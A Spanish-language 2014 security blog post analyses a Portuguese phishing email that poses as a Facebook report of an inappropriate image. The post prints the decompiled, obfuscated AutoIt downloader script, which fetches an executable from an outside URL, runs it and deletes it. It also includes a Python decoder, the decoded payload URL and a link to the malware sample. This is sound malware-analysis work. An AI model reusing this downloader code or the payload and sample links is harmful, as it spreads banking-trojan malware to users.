jueves, 13 de noviembre de 2014

Falsa denuncia de Imagen en Facebook.

 Ayer se despacharon con una supuesta imagen que fue denunciada por inapropiada en Facebook.
El texto esta en portugués por lo que seguramente se trate, como en otras oportunidades, de un downloader de un troyano bancario brasileño.

Fw: Uma imagem postada em sua linha do tempo foi denunciada!‏

ATENÇÃO: Denúncia de imagem de caráter impróprio constando em sua linha do tempo.




El link descarga un ejecutable


Analizado en V.T. se puede observar un indice muy bajo en detecciones.



El binario esta compilado con Autoit, conteniendo un Script Ofuscado.


Utilizando la herramienta exe2aut llegamos al script que es el siguiente:




#Region
#EndRegion
If FileExists(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ")) Then
FileDelete(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ"))
EndIf
$urldownloader = chesdvgnqzaltbe("]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ")
$directory = @TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ")
InetGet($urldownloader, $directory)
$m01837778 = Sleep(10000)
$y98384632 = Sleep(10000)
Run($directory)
Sleep(9000)
FileDelete(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ"))

Func chesdvgnqzaltbe($plsjkdmhgsfhjksiew)
Local $ifgewtqghstvbbjs
For $i = 1 To StringLen($plsjkdmhgsfhjksiew)
$ifgewtqghstvbbjs = $ifgewtqghstvbbjs & Chr(Asc(StringMid($plsjkdmhgsfhjksiew, $i, 1)) + 11)
Next
Return $ifgewtqghstvbbjs
EndFunc


Vemos que hay cadenas codificadas

]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#Zm
Q_hXg^e#ZmZ


La función chesdvgnqzaltbe es la encargada de decodificar la cadena haciendo una suma de 11 al valor ordinal del carácter.

Func chesdvgnqzaltbe($plsjkdmhgsfhjksiew)
Local $ifgewtqghstvbbjs
For $i = 1 To StringLen($plsjkdmhgsfhjksiew)
$ifgewtqghstvbbjs = $ifgewtqghstvbbjs & Chr(Asc(StringMid($plsjkdmhgsfhjksiew, $i, 1)) + 11)
Next
Return $ifgewtqghstvbbjs


Con un pequeño programa en Python podemos hacer este mismo trabajo.

import string

cadena =']iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ';

ca ='';
salida = '';


def sumab(string):
    data = []
    for k in xrange(len(string)):
            se = ord(string[k])
            xx = (se + 11)
            data += [chr(xx)]
    return data


salida = sumab(cadena);


for imprime in range(len(salida)):
    ca = ca + salida[imprime]
print ca


Por lo que las cadenas corresponden a lo siguiente:

]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#Zm

http://communicare.net.ec/xmlrpc/cache/jscrip.exe

Q_hXg^e#ZmZ

/jscrip.exe


Lamentablemente para nuestro analisis el sitio donde esta alojado el payload ha excedido el uso del ancho de banda.




Con el analisis dinámico llegamos a lo mismo.

Aquí una captura del trafico de red.



Muestra: https://www.dropbox.com/s/oubxld1jbo2e4f8/facebook%20malware%2012-11-14.rar
Eso es todo por el momento.

 @Dkavalanche 2014
en

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)

 Hola, me mudé a medium .... nos vemos!!! FELIZ 2022!!!

  • (sin título)
    Troyano de Formulario II, Falso Comprobante de deposito. En el día de hoy, me acercaron un correo sospechoso, el cual  intentaba, median...
  • (sin título)
    Campaña de Ransomware: Locky - Parte III Nueva campaña, esta vez se utiliza un documento  .docm que es un Documento Microsoft Word con macro...
  • ATARI ST Bootsector Virus
    Los primeros virus de boot sector aparecieron a mediados y fines de los 80 en lo que por aquel entonces eran las primeras computadoras que ...